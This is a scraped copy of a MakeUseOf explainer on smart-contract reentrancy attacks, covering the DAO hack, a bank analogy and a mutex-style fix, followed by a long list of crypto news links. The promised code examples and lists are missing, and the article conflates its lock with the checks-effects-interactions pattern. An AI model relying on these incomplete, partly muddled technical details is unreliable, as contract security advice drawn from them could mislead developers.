What Is a Reentrancy Attack and How Does It Work? – MUO – MakeUseOf
Some of the biggest hacks in the blockchain industry, where millions of dollars worth of cryptocurrency tokens got stolen, resulted from reentrancy attacks. While these hacks have becomes less common in recent years, they still pose a significant threat to blockchain applications and users.
So what precisely are reentrancy attacks? How are they deployed? And are there any measures developers can take to prevent them from happening?
A reentrancy attack occurs when a vulnerable smart contract function makes an external call to a malicious contract, temporarily giving up control of the transaction flow. The malicious contract then repeatedly calls the original smart contract function before it finishes executing while draining its funds.
Essentially, a withdrawal transaction on the Ethereum blockchain follows a three-step cycle: balance confirmation, remittance, and balance update. If a cybercriminal can hijack the cycle before the balance update, they can repeatedly withdraw funds until a wallet is drained.
One of the most infamous blockchain hacks, the Ethereum DAO hack, as covered by Coindesk, was a reentrancy attack that led to a loss of over $60 million worth of eth and fundamentally changed the course of the second largest cryptocurrency.
Imagine a bank in your hometown where virtuous locals keep their money; its total liquidity is $1 million. However, the bank has a flawed accounting systemstaffers wait until the evening to update bank balances.
Your investor friend visits the town and discovers the accounting flaw. He creates an account and deposits $100,000. A day later, he withdraws $100,000. After one hour, he makes another attempt of withdrawing $100,000. Since the bank has not updated his balance, it still reads $100,000. So he gets the money. He does this repeatedly until there's no money left. Staffers only realize there's no money when they balance the books in the evening.
In the context of a smart contract, the process goes as follows:
Generally, the attacker successfully exploits the reentrancy vulnerability to their advantage, stealing funds from the contract.
So how exactly might a reentrancy attack technically occur when deployed? Here's a hypothetical smart contract with a reentrancy gateway. We'll use axiomatic naming to make it easier to follow along.
The VulnerableContract lets users deposit eth into the contract using the deposit function. Users can then withdraw their deposited eth using the withdraw function. However, there's a reentrancy vulnerability in the withdraw function. When a user withdraws, the contract transfers the requested amount to the user's address before updating the balance, creating an opportunity for an attacker to exploit.
Now, here's what an attacker's smart contract would look like.
When the attack is launched:
The attack can happen very fast, depending on the network's performance. When involving complex smart contracts such as the DAO Hack, which led to the hard fork of Ethereum into Ethereum and Ethereum Classic, the attack happens over several hours.
To prevent a reentrancy attack, we need to modify the vulnerable smart contract to follow the best practices for secure smart contract development. In this case, we should implement the "checks-effects-interactions" pattern as in the code below.
In this fixed version, we've introduced an isLocked mapping to track whether a particular account is in the process of a withdrawal. When a user initiates a withdrawal, the contract checks if their account is locked (!isLocked[msg.sender]), indicating that no other withdrawal from the same account is currently in progress.
If the account isn't locked, the contract continues with the state change and external interaction. After the state change and external interaction, the account is unlocked again, allowing future withdrawals.
Generally, there are three main types of reentrancy attacks based on their nature of exploitation.
Reentrancy attacks can manifest in different forms and so require specific measures to prevent each.
Reentrancy attacks have caused substantial financial losses and undermined trust in blockchain applications. To protect contracts, developers must adopt best practices diligently to avoid reentrancy vulnerabilities.
They should also implement secure withdrawal patterns, use trusted libraries, and conduct thorough audits to fortify the smart contract's defense further. Of course, staying informed about emerging threats and being proactive with security efforts can ensure they uphold blockchain ecosystems' integrity too.
Visit link:
What Is a Reentrancy Attack and How Does It Work? - MUO - MakeUseOf
- Why (Almost) Everyone in Ethereum Is So Excited About a Wallet-Related Proposal - Unchained - Unchained - April 13th, 2024 [April 13th, 2024]
- Ethereum's Pectra upgrade slated for Q4 2024, bringing smart contract features and improved UX for wallets - Crypto Briefing - April 13th, 2024 [April 13th, 2024]
- Ethereum's Pectra upgrade to make normal wallets 'smart' and improve UX - Cointelegraph - April 13th, 2024 [April 13th, 2024]
- Ex-Amazon engineer sentenced to 3 years in prison for $12m crypto hack - crypto.news - April 13th, 2024 [April 13th, 2024]
- How Are Smart Contracts Transforming Financial Transactions? - IT News Africa - April 13th, 2024 [April 13th, 2024]
- Enhancing Smart Contract Security With SolidityScan and Blockscout Integration - Business - April 13th, 2024 [April 13th, 2024]
- Top 15 Use Cases of Blockchain in the Real World, 2024 - Analytics Insight - April 13th, 2024 [April 13th, 2024]
- exSat Unveiled: Pioneering the Future of Bitcoin Scalability and Interoperability with Layer 2 Solutions - FinanceFeeds - April 9th, 2024 [April 9th, 2024]
- ZkLink looks to solve Ethereum's fragmented liquidity with a layer 3 but there are risks - DLNews - April 9th, 2024 [April 9th, 2024]
- 1 in 6 new Base meme coins are scams, 91% have vulnerabilities - TradingView - April 9th, 2024 [April 9th, 2024]
- The AI-Based Smart Contract Audit Firm "Bunzz Audit" Has Officially Launched - Chronicle-Tribune - April 9th, 2024 [April 9th, 2024]
- BlockDAG Smart Contract Leads With 20,000x ROIs As Top Trending Crypto Surpassing Dogecoin Rally And ICP's ... - Blockchain Magazine - April 9th, 2024 [April 9th, 2024]
- The complete guide to full stack BSV blockchain development - CoinGeek - April 9th, 2024 [April 9th, 2024]
- What Is Ethereum Restaking? - Ledger - April 9th, 2024 [April 9th, 2024]
- The Contract Evolution: Are Smart Contracts Outsmarting Tradition? - yTech - April 1st, 2024 [April 1st, 2024]
- Vitalik Buterin Initiates 'The Purge': Ethereum Protocol Simplification for Enhanced Efficiency - TradingView - April 1st, 2024 [April 1st, 2024]
- sCrypt Hackathon 2024: Making Ordinals easier with smart contracts - CoinGeek - April 1st, 2024 [April 1st, 2024]
- Smart Contracts and Family Law: Revolutionizing Agreements for the Modern Family - The Good Men Project - April 1st, 2024 [April 1st, 2024]
- NEAR launches tool for signing transactions on Bitcoin, Ethereum and more - Blockworks - April 1st, 2024 [April 1st, 2024]
- sCrypt Hackathon 2024: Project Babbage on why users should be at the center of digital economy - CoinGeek - April 1st, 2024 [April 1st, 2024]
- Cardano Gains Momentum: Innovative Developments Promise Continued Expansion and Evolution - West Island Blog - April 1st, 2024 [April 1st, 2024]
- How smart accounts and account abstraction can unlock Ethereum's full utility - Cointelegraph - March 22nd, 2024 [March 22nd, 2024]
- Stellar will invest $100M in Soroban smart contract apps in bid to beat Ethereum - VentureBeat - March 22nd, 2024 [March 22nd, 2024]
- Top 10 Intriguing Ways EVM (Ethereum Virtual Machine) Was Popularized By DeFi Craze - Blockchain Magazine - March 22nd, 2024 [March 22nd, 2024]
- Cardano (ADA)'s Smart Contract Boom: Is ADA Heading to $5? - CryptoTicker.io - Bitcoin Price, Ethereum Price & Crypto News - March 22nd, 2024 [March 22nd, 2024]
- Solana vs Ethereum: Which Smart Contracts Blockchain Should You Pick? - CoinCodex - March 22nd, 2024 [March 22nd, 2024]
- Contribution of Chainlink to the advancement of smart contracts - Android Headlines - March 22nd, 2024 [March 22nd, 2024]
- Blockchain evolution with MANTA for Sora and intelligent contracts - Cointelegraph - March 22nd, 2024 [March 22nd, 2024]
- Top 10 Amazing Ways Ethereum Limitations Can Be Resolved By DApps Support - Blockchain Magazine - March 22nd, 2024 [March 22nd, 2024]
- The Anticipated Altcoin Season- A Look at the Possibilities and Potential Players Satoshi Business News - The San Bernardino American News - March 22nd, 2024 [March 22nd, 2024]
- Crypto to Buy Now: Stellar's Sorban, Scorpion Casinos' Daily Staking Reward for 10x Gains and Uniswaps Volatility - Analytics Insight - March 22nd, 2024 [March 22nd, 2024]
- Smart Contracts Go Live on Stellar, Kicking Off a "New Era" for the Network - Cryptonews - February 23rd, 2024 [February 23rd, 2024]
- Stacks (STX) price outperforms the market as interest in layer-2 Bitcoin grows - TradingView - February 23rd, 2024 [February 23rd, 2024]
- This Is What Vitalik Buterin Thinks About Artificial Intelligence (AI) - BeInCrypto - February 23rd, 2024 [February 23rd, 2024]
- 200-year-old Scotch whiskey maker enters the AI age with generated labels - ReadWrite - February 23rd, 2024 [February 23rd, 2024]
- Stellars Protocol 20 upgrade goes live, bringing smart contracts to the mainnet - Invezz - February 23rd, 2024 [February 23rd, 2024]
- Smart Contracts: the future of efficient and transparent business interactions - NL Times - February 23rd, 2024 [February 23rd, 2024]
- Understanding DAOs: The Pros and Cons of Decentralized Autonomous Organizations - Geeks World Wide - February 23rd, 2024 [February 23rd, 2024]
- Vitalik Buterin says AI could help solve Ethereum's 'biggest technical risk' - Cointelegraph - February 23rd, 2024 [February 23rd, 2024]
- Chainlink Bulls Brace For Explosive Growth Following $216 Million Whale Accumulation - TradingView - February 23rd, 2024 [February 23rd, 2024]
- Demystifying Smart Contracts: The Power of Decentralization | by Advancio | Dec, 2023 - Medium - December 10th, 2023 [December 10th, 2023]
- Web3 Firm Thirdweb Finds Major Vulnerability In Smart Contracts - Cryptonews - December 10th, 2023 [December 10th, 2023]
- What is Flare (FLR)?: Will Flare Price Explode in 2024? - CryptoTicker.io - Bitcoin Price, Ethereum Price & Crypto News - December 10th, 2023 [December 10th, 2023]
- Web3 developer Thirdweb boosts bounty to $50,000 in light of fresh smart contract security risks - CryptoSlate - December 10th, 2023 [December 10th, 2023]
- Smart contract exploit in TIME token leads to $188k loss - crypto.news - December 10th, 2023 [December 10th, 2023]
- The Future of Trust and Efficiency in Transactions - Medium - December 10th, 2023 [December 10th, 2023]
- Chainlink Community Staking Pool Full, Drawing More Than $620M - Unchained - December 10th, 2023 [December 10th, 2023]
- ERC-2771 integration introduces address spoofing vulnerability OpenZeppelin - Cointelegraph - December 10th, 2023 [December 10th, 2023]
- Introduction Of Smart Contract | by Ronintvmedia | Dec, 2023 - Medium - December 10th, 2023 [December 10th, 2023]
- The Top 10 Ethereum Developments That Impacted History | by Ragunath | Dec, 2023 - Medium - December 10th, 2023 [December 10th, 2023]
- Ethereum's Evolution: From Smart Contracts to Web3 Wonders - Medium - December 10th, 2023 [December 10th, 2023]
- FAssets Could Unlock the Potential of $800B in XRP and Other Crypto Assets - The Crypto Basic - December 10th, 2023 [December 10th, 2023]
- Decentralized Autonomous Organization (DAO) | by SMC Research | Dec, 2023 - Medium - December 10th, 2023 [December 10th, 2023]
- Why ChatGPT Is The Next Revolution In Smart Contracts And ... - Blockchain Magazine - September 7th, 2023 [September 7th, 2023]
- Ethereum's Smart Contracts meet Bitcoin Spark: A Match Made in ... - Captain Altcoin - September 7th, 2023 [September 7th, 2023]
- Casper Network first Layer-1 blockchain to enable native smart ... - The Block - September 7th, 2023 [September 7th, 2023]
- Ethereum Virtual Machine (EVM) and How It Executes Smart Contracts - BTC Peers - September 7th, 2023 [September 7th, 2023]
- Building Smart Contracts on Cardano Using the Plutus Platform - BTC Peers - September 7th, 2023 [September 7th, 2023]
- VeChain And Vyvo Smart Chain Forge A Blockchain Partnership - Blockzeit - September 7th, 2023 [September 7th, 2023]
- How Decentralized Autonomous Organizations Can Transform the ... - BTC Peers - September 7th, 2023 [September 7th, 2023]
- Companies Transitioning to Decentralized Autonomous Organizations - BTC Peers - September 7th, 2023 [September 7th, 2023]
- Top Analyst States That 'ETH Killers' Are Vying for Second Place, but ... - Captain Altcoin - September 7th, 2023 [September 7th, 2023]
- Why 'Refi' Is a Tool in the $35tn Sustainable Investing Market - Techopedia - September 7th, 2023 [September 7th, 2023]
- Hoping to take advantage of Intel's ecosystem? Here's what to do - Crain's Cleveland Business - September 7th, 2023 [September 7th, 2023]
- The 3 Best Cryptos to Buy Now: September 2023 - InvestorPlace - September 7th, 2023 [September 7th, 2023]
- Cardano's Vision for Interoperability with Other Blockchains - BTC Peers - September 7th, 2023 [September 7th, 2023]
- OpenChat puts governance to the vote thanks to Internet Computer - TechHQ - September 7th, 2023 [September 7th, 2023]
- Is Bitcoin Better than Ethereum? - Watcher Guru - August 20th, 2023 [August 20th, 2023]
- How Bitcoin Spark is Poised to Outperform BNB in the Crypto Market - The Coin Republic - August 20th, 2023 [August 20th, 2023]
- Revolutionizing Digital Transactions: The Emergence of Bitcoin ... - Crypto News Flash - August 20th, 2023 [August 20th, 2023]
- Transforming Supply Chains With SoluLab's Cutting-Edge ... - CMSWire - August 20th, 2023 [August 20th, 2023]
- Top Cryptos to Invest in 2023 Featuring Bitcoin, Ethereum, and ... - Analytics Insight - August 20th, 2023 [August 20th, 2023]
- Digital Supply Chains. The future of supply chain and business | by ... - Medium - August 20th, 2023 [August 20th, 2023]
- What is Injective Blockchain: A Comprehensive Guide | by Prateek ... - Medium - August 20th, 2023 [August 20th, 2023]
- Smart Contract Supremacy: A Riveting Exploration of Polkadot ... - Analytics Insight - July 30th, 2023 [July 30th, 2023]
- Smart Contracts Add to Flurry of Activity in Worlds of Cannabis and ... - Cannabis & Tech Today - July 30th, 2023 [July 30th, 2023]
- The Intersection of Blockchain and Energy Trading: Exploring Smart ... - EnergyPortal.eu - July 30th, 2023 [July 30th, 2023]
- The Story of Blockchain. Photo by Shubham Dhage on Unsplash ... - Medium - July 30th, 2023 [July 30th, 2023]
- Seda co-founders discuss intersection of oracles and multichain - Cointelegraph - July 30th, 2023 [July 30th, 2023]
- I Want To Buy My Groceries With Crypto So What's Stopping Me? - Entrepreneur - July 30th, 2023 [July 30th, 2023]